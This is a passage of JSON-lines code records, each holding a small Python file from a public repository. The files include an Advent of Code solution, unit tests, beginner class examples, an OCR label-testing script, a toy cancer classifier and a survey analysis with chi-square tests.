\n\nfor line in input.split('\\n'):\n if line.strip() == \"\":\n continue\n # normal grid - R increases x, U increases y etc.\n direction, steps = line.strip().split(' ')\n steps = int(steps)\n print(direction, steps)\n if direction == 'R':\n for _ in range(steps):\n rope[0] = (rope[0][0] + 1, rope[0][1])\n for i in range(1, len(rope)):\n rope[i] = update_tail(rope[i-1], rope[i])\n tail_positions.add(rope[-1])\n if direction == 'L':\n for _ in range(steps):\n rope[0] = (rope[0][0] - 1, rope[0][1])\n for i in range(1, len(rope)):\n rope[i] = update_tail(rope[i-1], rope[i])\n tail_positions.add(rope[-1])\n if direction == 'U':\n for _ in range(steps):\n rope[0] = (rope[0][0], rope[0][1] + 1)\n for i in range(1, len(rope)):\n rope[i] = update_tail(rope[i-1], rope[i])\n tail_positions.add(rope[-1])\n if direction == 'D':\n for _ in range(steps):\n rope[0] = (rope[0][0], rope[0][1] - 1)\n for i in range(1, len(rope)):\n rope[i] = update_tail(rope[i-1], rope[i])\n tail_positions.add(rope[-1])\n\npprint(tail_positions)\nprint(len(tail_positions))","repo_name":"evsmithx/scratch_python","sub_path":"advent_of_code_2022/day9b.py","file_name":"day9b.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"14076300257","text":"import unittest\nfrom unittest.mock import patch, mock_open\nfrom tiv_py.__main__ import main\nfrom tiv_py.Ansi import Ansi\n\nclass TestMainFunction(unittest.TestCase):\n\n @patch('tiv_py.__main__.parse_args')\n @patch('tiv_py.__main__.convert')\n def test_main_with_filename(self, mock_convert, mock_parse_args):\n mock_args = mock_parse_args.return_value\n mock_args.mode = \"24bit\"\n mock_args.max_width = 20\n mock_args.max_height = 10\n mock_args.stdin = False\n mock_args.html = False\n mock_args.grayscale = False\n mock_args.image_source = \"image.png\"\n \n main()\n \n mock_convert.assert_called_once_with(\n \"image.png\", 80, 80, Ansi.MODE_24BIT, False, False\n )\n
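\n # Note (added): unittest.mock applies stacked @patch decorators bottom-up,\n # so the decorator closest to the function supplies the first mock argument.\n # That is why mock_convert (from the innermost @patch) precedes\n # mock_parse_args in the test signatures in this file.\n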
\n @patch('tiv_py.__main__.parse_args')\n @patch('sys.stdin', new_callable=mock_open, read_data=\"image.png\\n\\n\")\n @patch('tiv_py.__main__.convert')\n def test_main_with_stdin(self, mock_convert, mock_stdin, mock_parse_args):\n mock_args = mock_parse_args.return_value\n mock_args.mode = \"256\"\n mock_args.max_width = 20\n mock_args.max_height = 10\n mock_args.stdin = True\n mock_args.html = False\n mock_args.grayscale = False\n mock_args.image_source = None\n \n with self.assertRaises(SystemExit) as cm:\n main()\n self.assertEqual(cm.exception.code, 2)\n \n # If the above passes, meaning the SystemExit occurred with the expected code,\n # now ensure convert was called with the correct parameters. However, if the\n # SystemExit is expected due to incorrect arguments, the below assertion should\n # be removed and the cause of the SystemExit should be corrected instead.\n mock_convert.assert_called_once_with(\n \"image.png\", 80, 80, Ansi.MODE_256, False, False\n )\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"projhect/tiv.py","sub_path":"tiv_py/main_test.py","file_name":"main_test.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"31018199932","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 15:20 2016/10/15\n\nauthor songxf\n\"\"\"\n\nusf=input('Enter the US Floor:') # In Python 3, input returns a string; use int(some_string) to convert it to an integer\n\nusf=int(usf)\nwf=usf-1\nprint('Non-US Floor Number is',wf)\n\n\n\nmovies=list()\nmovie1=dict()\nmovie1['Director']='James Cameron'\nmovie1['Title']='Avatar'\nmovie1['Release date']='18 December 2009'\nmovie1['Running Time']='162 Minutes'\nmovie1['Rating']='PG-13'\nmovies.append(movie1)\n\nmovie2=dict()\nmovie2['Director']='David Fincher'\nmovie2['Title']='The Social Network'\nmovie2['Release date']='01 October 2010'\nmovie2['Running Time']='120 Minutes'\nmovie2['Rating']='PG-13'\nmovies.append(movie2)\n\nprint(movies)\n\n\nkeys=['Title','Director','Rating','Running Time']\nprint('-------------')\nprint(movies)\nprint('-------------')\nprint('keys')\n\nfor item in movies:\n\tprint('------------')\n\tfor key in keys:\n\t\tprint(key,':',item[key])\nprint('-------------')\n\n\nclass PartyAnimal: # define a class\n\tx=0\n\n\tdef party(self):\n\t\tself.x=self.x+1\n\t\tprint('So far',self.x)\nan=PartyAnimal() # use the class defined above to create an object\nan.party()\nan.party()\nan.party()\n\nx=list()\ntype(x)\ndir(x)\n\n\ny='Hello there'\ndir(y)\n\nprint('Type:',type(an))\nprint('Dir:',dir(an))\n\nclass PartyAnimal:\n\tx=0\n\n\tdef __init__(self):\n\t\tprint('I am constructed')\n\n\tdef party(self):\n\t\tself.x=self.x+1\n\t\tprint('So far',self.x)\n\n\tdef __del__(self):\n\t\tprint('I am destructed',self.x)\n\nan=PartyAnimal()\nan.party()\nan.party()\nan.party()\n\n\nclass PartyAnimal:\n\tx=0\n\tname=\"\"\n\tdef __init__(self,z):\n\t\tself.name=z\n\t\tprint(self.name,'constructed')\n\n\tdef party(self):\n\t\tself.x=self.x+1\n\t\tprint(self.name,\"party count\",self.x)\n\ns=PartyAnimal(\"Sally\")\ns.party()\n\nj=PartyAnimal(\"Jim\")\nj.party()\ns.party()\n\nclass FootballFan(PartyAnimal):\n\tpoints=0\n\tdef touchdown(self):\n\t\tself.points=self.points+7\n\t\tself.party()\n\t\tprint(self.name,'points',self.points)\n\ns=PartyAnimal(\"Sally\")\ns.party()\n\nj=FootballFan(\"Jim\")\nj.party()\nj.touchdown()\n\n\n\n\n\n\n\n\n","repo_name":"lnsongxf/Python_for_everybody","sub_path":"Chapter13_Objects.py","file_name":"Chapter13_Objects.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"43310337941","text":"from typing import List\n\n# Given an unsorted integer array nums, return the smallest missing \n# positive integer. 
You must implement an algorithm that runs in O(n) \n# time and uses constant extra space.\n#\n# Constraints:\n# - 1 <= nums.length <= 5 * 105\n# - -231 <= nums[i] <= 231 - 1\n\nclass Solution:\n def firstMissingPositive(self, nums: List[int]) -> int:\n pool = set(nums)\n max = len(nums) + 1\n for n in range(1, max):\n if n not in pool:\n return n\n return max\n\n\nget = Solution()\n#print(get.firstMissingPositive([3,4,-1,1]))\nprint(get.firstMissingPositive([1]))","repo_name":"Trequetrum/leetcode_practice","sub_path":"Python3/first_missing_positive3.py","file_name":"first_missing_positive3.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"40192568607","text":"from contours import contour, draw_image\nfrom categories import (\n easy_labels, skewed_labels, lighting_labels, standard_labels,\n curved_labels, colored_labels, horizontal_labels)\nfrom text import apply_tesseract\nfrom post_process import post_process\nfrom keywords import Keywords\nimport cv2\nimport sys\nimport os\nimport jsonpickle\nfrom pprint import pprint\nfrom PIL import Image\nfrom timeit import default_timer as timer\nfrom subprocess import call\nfrom attrdict import AttrDict\n\n\ndef test_labels(dirpath, labels=None):\n \"\"\"\n Runs a complete label test on every .jpg in the specified directory.\n \"\"\"\n if labels is None:\n labels = easy_labels()\n ocr_results = []\n failed = []\n for label in labels:\n impath = os.path.join(dirpath, label.name + '.jpg')\n ret = test_label(impath, label)\n if ret:\n results, ocr_label = ret\n ocr_results.append((results, label))\n else:\n print(\"Label %s failed\" % label.name)\n failed.append(label)\n\n completed = [x for x in ocr_results if x]\n print('%d/%d labels processed to completion' % (\n len(completed), len(labels)))\n failed_str = ', '.join([l.name for l in failed])\n print('Failed labels: %s' % failed_str)\n\n total_correct = sum(len(x.correct) for x, y in completed)\n total = total_correct + sum(len(x.incorrect) for x, y in completed)\n print('%d/%d keywords correct for completed labels' % (\n total_correct, total))\n\n pct_rank = [(len(x.correct)/(len(x.incorrect) + len(x.correct)), y.name)\n for x, y in completed]\n pct_rank.sort(key=lambda tup: tup[0])\n\n pct_rank_str = ', '.join(\n ['%s: %.2f%%' % (x[1], 100*x[0]) for x in pct_rank])\n print('Labels %% correct: %s' % pct_rank_str)\n\n # Gather keyword accuracy data\n default_result = {'correct': 0, 'incorrect': 0}\n tuples = [(v, default_result.copy()) for v in Keywords.json.values()]\n keyword_results = AttrDict(dict(tuples))\n for k in Keywords.json:\n for result, label in ocr_results:\n if k in result.correct:\n keyword_results[k]['correct'] += 1\n else:\n keyword_results[k]['incorrect'] += 1\n print(\"Key: %s\\n%s\" % (k, keyword_results[k]))\n\n keywords_rank = []\n for k in Keywords.json:\n # Create accuracy ratings for each keywords\n correct = keyword_results[k]['correct']\n incorrect = keyword_results[k]['incorrect']\n accuracy = correct / (correct + incorrect)\n keywords_rank.append((k, accuracy))\n\n # Rank keywords by accuracy\n keywords_rank.sort(key=lambda tup: tup[1])\n\n pct_completed = len(completed)/len(labels)\n pct_accurate = total_correct/total\n return (pct_completed, pct_accurate, keywords_rank, pct_rank)\n\n\ndef test_categories(dirpath):\n std_ret = test_labels(dirpath, standard_labels())\n skew_ret = test_labels(dirpath, skewed_labels())\n light_ret = test_labels(dirpath, 
lighting_labels())\n curve_ret = test_labels(dirpath, curved_labels())\n horiz_ret = test_labels(dirpath, horizontal_labels())\n color_ret = test_labels(dirpath, colored_labels())\n\n def print_results(ret, label_type=''):\n ret_str = '%.2f%% completed, %.2f%% accurate' %\\\n (ret[0]*100, ret[1]*100)\n print('%s labels: %s' % (label_type, ret_str))\n\n print_results(std_ret, 'Standard')\n print_results(skew_ret, 'Skewed')\n print_results(light_ret, 'Lighting')\n print_results(curve_ret, 'Curved')\n print_results(horiz_ret, 'Horizontal')\n print_results(color_ret, 'Colored')\n\n\ndef test_label(impath, label=None, jsonpath=None, demo=False):\n \"\"\"\n Test for a label found in the given image, and compare with the\n second 'label' argument.\n If the jsonpath argument is provided, information\n from that file is used instead of the other specified arguments.\n \"\"\"\n if jsonpath is not None:\n json_file = open(jsonpath)\n label = jsonpickle.decode(json_file.read())\n\n if label is not None:\n print('Label %s' % label.name)\n ocr_label = end_to_end(impath, show=False, demo=demo)\n if ocr_label is False:\n print('Label Error')\n return False\n\n print(ocr_label)\n print('')\n # Compare this label with the JSON label object\n if label is not None and ocr_label is not None:\n results = AttrDict({'correct': [], 'incorrect': []})\n for k in Keywords.json.values():\n if label[k] == ocr_label[k]:\n results.correct.append(k)\n else:\n results.incorrect.append(k)\n\n return (results, ocr_label)\n\n return ocr_label\n\n\ndef demo_label(impath, jsonpath='../db/demo.json',\n backup_path='./demo/demo_2.jpg'):\n\n # Check to make sure it worked the first time\n correct, count, label = test_label(impath, jsonpath=jsonpath, demo=True)\n\n # If failed, move to backup image\n if correct < count:\n impath = backup_path\n\n # Actually demo now\n correct, count, label = test_label(impath, jsonpath=jsonpath, demo=True)\n\n image_order = [\"original\", \"gray\", \"blur\", \"hist\", \"thresholdm\",\n \"thresholdg\", \"contour\", \"final\"]\n image_paths = []\n basename = os.path.basename(impath)\n demo_dir = 'demo'\n for i, im_prefix in enumerate(image_order):\n prev_name = os.path.join(demo_dir, im_prefix + basename)\n new_name = os.path.join(demo_dir, str(i) + im_prefix + basename)\n os.rename(prev_name, new_name)\n image_paths.append(new_name)\n\n base = os.path.splitext(basename)[0]\n text_filenames = [\"tess_\" + base + \".txt\", \"result_\" + base + \".js\"]\n text_filepaths = [os.path.join(demo_dir, x) for x in text_filenames]\n\n # Write label object to text file\n with open(text_filepaths[-1], 'w') as result_file:\n pprint(label.__dict__, stream=result_file)\n\n call(['xdg-open', image_paths[0]])\n call(['xdg-open', text_filepaths[0]])\n call(['xdg-open', text_filepaths[1]])\n\n\ndef end_to_end(impath, show=False, demo=False):\n \"\"\"\n Return a Label object from a label in the provided image.\n \"\"\"\n\n start = timer()\n# try:\n img = Image.open(impath)\n exif_data = img._getexif()\n\n orientation = 1\n if exif_data is not None:\n # orientation tag is 0x0112\n o_data = exif_data[274]\n if o_data is not None:\n orientation = int(o_data)\n\n label_im = contour(impath, demo=demo, orientation=orientation)\n if label_im is False:\n label_im = contour(impath, invert=True, demo=demo)\n if label_im is False:\n return False\n\n end = timer()\n print('Pre process time: %2f' % (end-start))\n\n basename = os.path.basename(impath)\n label_impath = impath.replace(basename, 'tmp_' + basename)\n # label_impath = 
impath.lower().replace('.jpg', 'label_tmp.jpg')\n cv2.imwrite(label_impath, label_im)\n\n start = timer()\n # Apply Tesseract to image\n output = apply_tesseract(label_impath, demo=demo)\n\n end = timer()\n print('OCR time: %2f' % (end-start))\n os.remove(label_impath)\n\n start = timer()\n ocr_label = post_process(output, demo=demo)\n\n end = timer()\n print('Post process time: %2f' % (end-start))\n\n if show:\n draw_image(label_im, 'Transformed label: %s' % impath)\n\n return ocr_label\n\n\ndef main():\n pass\n\n# Run when called from command line, not import.\nif __name__ == '__main__':\n if len(sys.argv) > 1:\n arg = sys.argv[1]\n if arg == 'demo':\n demo_label(sys.argv[2])\n elif arg == 'categories':\n test_categories(sys.argv[2])\n elif os.path.isdir(arg):\n test_labels(arg)\n elif os.path.isfile(arg):\n json_path = None\n if len(sys.argv) > 2:\n json_path = '../db/' + sys.argv[2] + '.json'\n ret = test_label(arg, jsonpath=json_path)\n if ret is not None:\n if len(ret) == 1:\n label = ret\n else:\n res, label = ret\n print('%d/%d Correct' % (len(res.correct),\n (len(res.correct) +\n len(res.incorrect))))\n else:\n print('Usage:\\n\\t\\'python3 end_to_end.py <path>\\'\\n\\\n (path should be a file or directory).')\n","repo_name":"rsullivan00/labelRecognizer","sub_path":"python/end_to_end.py","file_name":"end_to_end.py","file_ext":"py","file_size_in_byte":8406,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"}
+{"seq_id":"28102030202","text":"import cv2\r\nfrom PIL import Image\r\nfrom PIL.ImageColor import colormap\r\nfrom matplotlib.pyplot import figure, subplot, gray, title\r\nfrom numpy import *\r\nimport numpy as np\r\nfrom scipy import ndimage\r\nfrom scipy.ndimage import filters\r\nfrom scipy.signal import convolve2d\r\nfrom skimage.io import imread,imsave,imshow\r\nfrom matplotlib import pyplot as plt\r\n\r\ndef gauss_1(sigma_d):\r\n #result=cv2.GaussianBlur(image,(999,999),sigma_d)\r\n #return result\r\n kernel_size = 2 * 3 * sigma_d + 1\r\n kernel = np.zeros((int(kernel_size), int(kernel_size)))\r\n center = kernel_size // 2\r\n s = sigma_d ** 2\r\n #sum_val = 0\r\n for i in range(int(kernel_size)):\r\n for j in range(int(kernel_size)):\r\n x, y = i - center, j - center\r\n kernel[i, j] = (-x/s)*np.exp(-(x ** 2 + y ** 2) / (2 * s))\r\n # print(i,j,kernel[i,j])\r\n #kernel = kernel / (2 * np.pi * s)\r\n return kernel\r\n\r\ndef gauss_2(sigma_d):\r\n #result=cv2.GaussianBlur(image,(999,999),sigma_d)\r\n #return result\r\n kernel_size = 2 * 3 * sigma_d + 1\r\n kernel = np.zeros((int(kernel_size), int(kernel_size)))\r\n center = kernel_size // 2\r\n s = sigma_d ** 2\r\n #sum_val = 0\r\n for i in range(int(kernel_size)):\r\n for j in range(int(kernel_size)):\r\n x, y = i - center, j - center\r\n kernel[i, j] = (-y/s)*np.exp(-(x ** 2 + y ** 2) / (2 * s))\r\n # print(i,j,kernel[i,j])\r\n #kernel = kernel / (2 * np.pi * s)\r\n return kernel\r\n\r\nG = imread(\"in.bmp\")\r\ngraph = np.array(G,dtype='float')\r\n #kernel = gauss_1(float(sys.argv[2]))\r\n #im = ndimage.convolve(graph[:,:,0], kernel)\r\nkernel1=gauss_1(4)\r\nkernel2=gauss_2(4)\r\nim1=ndimage.convolve(graph[:, :, 0], kernel1)\r\nim2=ndimage.convolve(graph[:, :, 0], kernel2)\r\nim=sqrt(im1*im1+im2*im2)\r\n#im=abs(im1)+abs(im2)\r\ngmax=np.max(im)\r\nfor i in range(int(G.shape[0])):\r\n for j in range(int(G.shape[1])):\r\n if(im[i,j]==gmax):\r\n im[i,j]=255\r\n else:\r\n im[i,j]=im[i,j]*255/gmax\r\nprint(im)\r\nIMAGE 
= np.array(im, dtype='uint8')\r\nimsave(\"new1.bmp\", IMAGE)\r\n","repo_name":"helexin2022/test","sub_path":"3_helexin/grad2.py","file_name":"grad2.py","file_ext":"py","file_size_in_byte":2163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22995183408","text":"import pandas as pd\nimport pickle\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import accuracy_score\n\n# Load the data\nDATA_PATH = \"cancer.csv\"\ndf = pd.read_csv(DATA_PATH)\n\n# Preprocess the data\nle = LabelEncoder()\ndf['diagnosis'] = le.fit_transform(df['diagnosis']) # Convert diagnosis M/B to 1/0\n\n# Select the features and the target\nX = df[[\"radius_mean\", \"area_mean\", \"perimeter_mean\", \"concavity_mean\", \"concave points_mean\"]]\ny = df['diagnosis']\n\n# Split the data into training and testing sets\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)\n\n# Define and train the model\nmodel = RandomForestClassifier()\nmodel.fit(X_train, y_train)\n\n# Save the trained model to a file\npickle.dump(model, open(\"cancer.pkl\", 'wb'))\n\n# Load the model from the file\nmodel = pickle.load(open(\"cancer.pkl\", 'rb'))\n\n# Predict the values for the testing set\ny_pred = model.predict(X_test)\n\n# Calculate and print the accuracy\naccuracy = accuracy_score(y_test, y_pred)\nprint(f\"Model Accuracy: {accuracy}\")\n\n# Get user input for new data\nradius_mean = float(input(\"Enter the Mean of the Radius: \"))\narea_mean = float(input(\"Enter the Mean of the Area: \"))\nperimeter_mean = float(input(\"Enter the Mean of the Perimeter: \"))\nconcavity_mean = float(input(\"Enter the Mean of the Concavity: \"))\nconcave_points_mean = float(input(\"Enter the Mean of the Concave Points: \"))\n\nnew_data = [[radius_mean, area_mean, perimeter_mean, concavity_mean, concave_points_mean]] # Example data\nprediction = model.predict(new_data)\n\nif prediction[0] == 1:\n print(\"The cancer is malignant.\")\nelse:\n print(\"The cancer is benign.\")\n","repo_name":"adilsp5075/medH-fastapi","sub_path":"prediction/cancer.py","file_name":"cancer.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"10786381685","text":"# Time: O(|E|)\n# Space: O(|E|)\n\nimport collections\nimport itertools\n\nclass Solution(object):\n def findAllRecipes(self, recipes, ingredients, supplies):\n \"\"\"\n :type recipes: List[str]\n :type ingredients: List[List[str]]\n :type supplies: List[str]\n :rtype: List[str]\n \"\"\"\n indegree = collections.defaultdict(int)\n adj = collections.defaultdict(list)\n for r, ingredient in itertools.izip(recipes, ingredients): \n indegree[r] = len(ingredient)\n for ing in ingredient:\n adj[ing].append(r)\n result = []\n recipes = set(recipes)\n q = supplies\n while q: \n new_q = []\n for u in q:\n if u in recipes:\n result.append(u)\n for v in adj[u]:\n indegree[v] -= 1\n if not indegree[v]:\n new_q.append(v)\n q = new_q\n return result \n","repo_name":"kamyu104/LeetCode-Solutions","sub_path":"Python/find-all-possible-recipes-from-given-supplies.py","file_name":"find-all-possible-recipes-from-given-supplies.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":4314,"dataset":"github-code","pt":"40"} +{"seq_id":"15599413231","text":"import 
pytest\n\nfrom changelog_gen import errors\nfrom changelog_gen.cli.command import SUPPORTED_SECTIONS\nfrom changelog_gen.extractor import ReleaseNoteExtractor\n\n\n@pytest.fixture()\ndef release_notes(cwd):\n r = cwd / \"release_notes\"\n r.mkdir()\n f = r / \".file\"\n f.write_text(\"\")\n return r\n\n\n@pytest.fixture()\ndef _valid_release_notes(release_notes):\n for i, note in enumerate([\"1.fix\", \"2.feat\", \"3.feat\", \"4.fix\"], 1):\n n = release_notes / note\n n.write_text(f\"Detail about {i}\")\n\n\n@pytest.fixture()\ndef _breaking_release_notes(release_notes):\n for i, note in enumerate([\"1.fix!\", \"2.feat\", \"3.feat!\", \"4.fix\"], 1):\n n = release_notes / note\n n.write_text(f\"Detail about {i}\")\n\n\n@pytest.fixture()\ndef _invalid_release_notes(release_notes):\n for i, note in enumerate([\"1.fix\", \"2.feat\", \"3.bug\", \"4.fix\"], 1):\n n = release_notes / note\n n.write_text(f\"Detail about {i}\")\n\n\n@pytest.fixture()\ndef _remap_release_notes(release_notes):\n for i, note in enumerate([\"1.bugfix\", \"2.feature\", \"3.test\"]):\n n = release_notes / note\n n.write_text(f\"Detail about {i}\")\n\n\n@pytest.mark.usefixtures(\"cwd\")\ndef test_init_with_no_release_notes_raises():\n with pytest.raises(errors.NoReleaseNotesError):\n ReleaseNoteExtractor(SUPPORTED_SECTIONS)\n\n\ndef test_init_with_release_notes_non_dir_raises(cwd):\n r = cwd / \"release_notes\"\n r.write_text(\"not a dir\")\n\n with pytest.raises(errors.NoReleaseNotesError):\n ReleaseNoteExtractor(SUPPORTED_SECTIONS)\n\n\n@pytest.mark.usefixtures(\"_valid_release_notes\")\ndef test_valid_notes_extraction():\n e = ReleaseNoteExtractor(SUPPORTED_SECTIONS)\n\n sections = e.extract()\n\n assert sections == {\n \"feat\": {\n \"2\": {\"description\": \"Detail about 2\", \"breaking\": False},\n \"3\": {\"description\": \"Detail about 3\", \"breaking\": False},\n },\n \"fix\": {\n \"1\": {\"description\": \"Detail about 1\", \"breaking\": False},\n \"4\": {\"description\": \"Detail about 4\", \"breaking\": False},\n },\n }\n\n\n@pytest.mark.usefixtures(\"_breaking_release_notes\")\ndef test_breaking_notes_extraction():\n e = ReleaseNoteExtractor(SUPPORTED_SECTIONS)\n\n sections = e.extract()\n\n assert sections == {\n \"feat\": {\n \"2\": {\"description\": \"Detail about 2\", \"breaking\": False},\n \"3\": {\"description\": \"Detail about 3\", \"breaking\": True},\n },\n \"fix\": {\n \"1\": {\"description\": \"Detail about 1\", \"breaking\": True},\n \"4\": {\"description\": \"Detail about 4\", \"breaking\": False},\n },\n }\n\n\n@pytest.mark.usefixtures(\"_invalid_release_notes\")\ndef test_invalid_notes_extraction_raises():\n e = ReleaseNoteExtractor(SUPPORTED_SECTIONS)\n\n with pytest.raises(errors.InvalidSectionError):\n e.extract()\n\n\n@pytest.mark.usefixtures(\"_invalid_release_notes\")\ndef test_section_remapping_can_remap_custom_sections():\n e = ReleaseNoteExtractor(SUPPORTED_SECTIONS)\n\n sections = e.extract({\"bug\": \"fix\"})\n assert sections == {\n \"feat\": {\n \"2\": {\"description\": \"Detail about 2\", \"breaking\": False},\n },\n \"fix\": {\n \"1\": {\"description\": \"Detail about 1\", \"breaking\": False},\n \"3\": {\"description\": \"Detail about 3\", \"breaking\": False},\n \"4\": {\"description\": \"Detail about 4\", \"breaking\": False},\n },\n }\n\n\n@pytest.mark.usefixtures(\"_invalid_release_notes\")\ndef test_section_mapping_can_handle_new_sections():\n e = ReleaseNoteExtractor({\"bug\": \"BugFix\", \"feat\": \"Features\"})\n\n sections = e.extract({\"fix\": \"bug\"})\n assert 
sections == {\n \"feat\": {\n \"2\": {\"description\": \"Detail about 2\", \"breaking\": False},\n },\n \"bug\": {\n \"1\": {\"description\": \"Detail about 1\", \"breaking\": False},\n \"3\": {\"description\": \"Detail about 3\", \"breaking\": False},\n \"4\": {\"description\": \"Detail about 4\", \"breaking\": False},\n },\n }\n\n\n@pytest.mark.usefixtures(\"_valid_release_notes\")\ndef test_dry_run_clean_keeps_files(release_notes):\n e = ReleaseNoteExtractor(SUPPORTED_SECTIONS, dry_run=True)\n\n e.clean()\n\n assert sorted([f.name for f in release_notes.iterdir()]) == sorted(\n [\n \"1.fix\",\n \"2.feat\",\n \"3.feat\",\n \"4.fix\",\n \".file\",\n ],\n )\n\n\n@pytest.mark.usefixtures(\"_valid_release_notes\")\ndef test_clean_removes_all_non_dotfiles(release_notes):\n \"\"\"Clean should not remove .gitkeep files etc.\"\"\"\n e = ReleaseNoteExtractor(SUPPORTED_SECTIONS)\n\n e.clean()\n\n assert [f.name for f in release_notes.iterdir()] == [\".file\"]\n","repo_name":"EdgyEdgemond/changelog-gen","sub_path":"tests/test_extractor.py","file_name":"test_extractor.py","file_ext":"py","file_size_in_byte":4672,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"}
+{"seq_id":"7354560386","text":"import pandas as pd\nimport matplotlib.pyplot as m\nimport scipy.stats as sp\nimport seaborn as s\n\ndf = pd.read_csv(r\"INFI\\Aufgabe5\\data\\ESS8e02.1_F1.csv\", sep=\",\")\ndf[\"gndr\"] = pd.cut(df[\"gndr\"], [0,1,2,9], labels=[\"Male\", \"Female\", \"Unspecified\"])\ngender = df[\"gndr\"]\n\n#1.3 a\ntrustPolice = df[\"trstplc\"]\ntrustPoliceGender = pd.crosstab(trustPolice, gender, normalize=\"index\")\ntrustPoliceGender.plot.bar()\nm.show()\n\nchi, p, dof, expected = sp.chi2_contingency(trustPoliceGender)\nprint(chi, \"\\n\", p, \"\\n\", dof, \"\\n\", expected)\n\ns.heatmap(trustPoliceGender, annot=False, cmap=\"YlGnBu\")\ns.heatmap(trustPoliceGender, annot=trustPoliceGender, annot_kws={'va':'bottom'}, fmt=\"\", cbar=False , cmap=\"YlGnBu\")\ns.heatmap(trustPoliceGender, annot=expected, annot_kws={'va':'top'}, fmt=\".2f\", cbar=False, cmap=\"YlGnBu\")\nm.show()\n\n# As the charts show, this claim is not true\n# Women tend to trust the police more than men\n# and that even though a larger share of women did not want to answer the question\n
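\n# Added side note: scipy's chi2_contingency expects a table of raw counts; the\n# call above passes a row-normalized table, which changes the statistic. A\n# sketch using counts instead (illustrative helper, not called by the script):\ndef _chi2_on_counts(frame):\n counts = pd.crosstab(frame[\"trstplc\"], frame[\"gndr\"]) # unnormalized counts\n return sp.chi2_contingency(counts)\n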
df[\"cntry\"].loc[df[\"cntry\"].isin([\"AT\", \"HU\"])]\nclimateFeelingATHU = pd.crosstab(climateFeeling, countries, normalize=\"index\")\nclimateFeelingATHU.plot.bar()\nm.show()\n\nchi, p, dof, expected = sp.chi2_contingency(climateFeelingATHU)\nprint(chi, \"\\n\", p, \"\\n\", dof, \"\\n\", expected)\n\ns.heatmap(climateFeelingATHU, annot=False, cmap=\"YlGnBu\")\ns.heatmap(climateFeelingATHU, annot=climateFeelingATHU, annot_kws={'va':'bottom'}, fmt=\"\", cbar=False , cmap=\"YlGnBu\")\ns.heatmap(climateFeelingATHU, annot=expected, annot_kws={'va':'top'}, fmt=\".2f\", cbar=False, cmap=\"YlGnBu\")\nm.show()\n\n# Wie aus den Diagrammen gut ersichtlich ist, wirkt der Klimawandel\n# schlechter auf Österreicher, als auf Ungarer\n# Diese Aussage wird durch die Berechung zusätzlich gefestigt\n\n\n\n#1.3 d\nbaseIncome = df[\"basinc\"]\nbaseIncGender = pd.crosstab(baseIncome, gender, normalize=\"index\")\nbaseIncGender.plot.bar()\nm.show()\n\nstats, p = sp.mannwhitneyu(baseIncome.loc[df[\"gndr\"] == \"Male\"], baseIncome.loc[df[\"gndr\"] == \"Female\"])\nprint(stats, \"\\n\", p,)\n\ns.heatmap(baseIncGender, annot=False, cmap=\"YlGnBu\")\ns.heatmap(baseIncGender, annot=baseIncGender, annot_kws={'va':'bottom'}, fmt=\"\", cbar=False , cmap=\"YlGnBu\")\ns.heatmap(baseIncGender, annot=False, annot_kws={'va':'top'}, fmt=\".2f\", cbar=False, cmap=\"YlGnBu\")\nm.show()\n\n# Die Aussage, dass Frauen eher einem bedingungslosen Einkommmen zustimmen ist wahr\n# Dies wird besonders bei Betrachtung der Diagramme ersichtlich, da dort vor allem bei einer starken Bewertung (7-9)\n# der Anteil an Frauen bei weitem größer ist, als der Anteil an Männern\n\n\n\n#1.3 e1\nhydroEnergy = df[\"elghydr\"]\ncountries = df[\"cntry\"].loc[df[\"cntry\"].isin([\"AT\", \"DE\"])]\nhydroEnergyATDE = pd.crosstab(hydroEnergy, countries, normalize=\"index\")\nhydroEnergyATDE.plot.bar()\nm.show()\n\nchi, p, dof, expected = sp.chi2_contingency(hydroEnergyATDE)\nprint(chi, \"\\n\", p, \"\\n\", dof, \"\\n\", expected)\n\ns.heatmap(hydroEnergyATDE, annot=False, cmap=\"YlGnBu\")\ns.heatmap(hydroEnergyATDE, annot=hydroEnergyATDE, annot_kws={'va':'bottom'}, fmt=\"\", cbar=False , cmap=\"YlGnBu\")\ns.heatmap(hydroEnergyATDE, annot=expected, annot_kws={'va':'top'}, fmt=\".2f\", cbar=False, cmap=\"YlGnBu\")\nm.show()\n\n# Bei genauerer Untersuchung der Interessen der Bevölkerung zur Thematik der Wasserkraft, stellte sich heraus,\n# dass Deutsche bei weitem mehr daran interessiert sind einen Großteil ihrer Energie durch Wasskraft zu gewinnen\n# als Österreicher\n\n\n\n#1.3 e2\nattachedToCountry = df[\"atchctr\"]\ncountries = df[\"cntry\"].loc[df[\"cntry\"].isin([\"AT\", \"FR\"])]\naTC_ATFR = pd.crosstab(attachedToCountry, countries, normalize=\"index\")\naTC_ATFR.plot.bar()\nm.show()\n\nchi, p, dof, expected = sp.chi2_contingency(aTC_ATFR)\nprint(chi, \"\\n\", p, \"\\n\", dof, \"\\n\", expected)\n\ns.heatmap(aTC_ATFR, annot=False, cmap=\"YlGnBu\")\ns.heatmap(aTC_ATFR, annot=aTC_ATFR, annot_kws={'va':'bottom'}, fmt=\"\", cbar=False , cmap=\"YlGnBu\")\ns.heatmap(aTC_ATFR, annot=expected, 